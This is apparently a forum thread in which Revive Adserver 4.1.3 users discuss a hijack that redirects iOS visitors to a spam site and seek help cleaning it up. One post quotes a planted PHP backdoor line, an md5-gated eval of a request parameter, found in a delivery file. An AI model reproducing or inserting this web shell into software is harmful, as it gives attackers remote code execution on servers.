[Mobile ads have been hijacked]

OK thanks Matteo!

Q. Where would I look to find log data to see when this file was modified?

[Mobile ads have been hijacked]

My genericText.delivery file has this line...

if(isset($_REQUEST['oxText'])&&md5($_REQUEST['oxText'])=='6f3ba4fbec5bfe3817fc319f3031fdaa'){@eval($_REQUEST['zoneId']);}
?>

I take it that this should be deleted?

[Mobile ads have been hijacked]

I discovered the same thing...  code has been prepended in rv_zones, with the same code as sunech. 

[Mobile ads have been hijacked]

Hi sunech, sorry to hear about your similar problems, it's a real headache, isn't it. ?

I haven't had time yet to dive in, but hopefully in the next day or so.

[Mobile ads have been hijacked]

Thanks Ian vM, I much appreciate that. 

[Mobile ads have been hijacked]

yes, I have full access to the server and MySQL database. I haven't found anything suspicious yet on the server, and haven't had time to look at the database. I'm still gathering info on what might be the issue, and what can be done.  I'm assuming the database has been compromised, especially after reading those articles.

[Mobile ads have been hijacked]

Yes always 4.1.3, with very strong passwords on the database, and admin accounts. ?

[Mobile ads have been hijacked]

On pages without the Revive code, things are normal. With it, the attack occurs. Changing the name of the Revive folder immediately stops the attack on every affected page.

I found some links on this:

How to Clean Your Hacked OpenX/Revive Adserver

and

What to do when you suspect your OpenX Source system has been hacked - Revive Support

[Mobile ads have been hijacked]

Revive Adserver 4.1.3

[Mobile ads have been hijacked]

Hi folks. We've been using Revive ads on our website for many months now, with no problems, but yesterday all of our iOS traffic was hijacked by a rogue spam script of some kind. It only occurred on iOS devices, like iPads and iPhones, not Macs. (I didn't have Android or Windows to test those out)

The page loads, but then a pop-up appears, closing it, sends you to a spam/malware site (mobile2018newmine.pw). I turned off all our campaigns but the attack still occurred. The only thing that stops it is either removing the Revise code from a page, or what I did, changing the folder name of the Revise ads, which stopped the attack from launching. This of course also stops all of our ads too, but better that, than subject our traffic to the hijack.

Any ideas as to how I can fix this? I'm thinking our SQL server was compromised? I'm not sure what else would cause this, and I want to prevent this from happening in the future. Suggestions would be appreciated. 

Thanks in advance!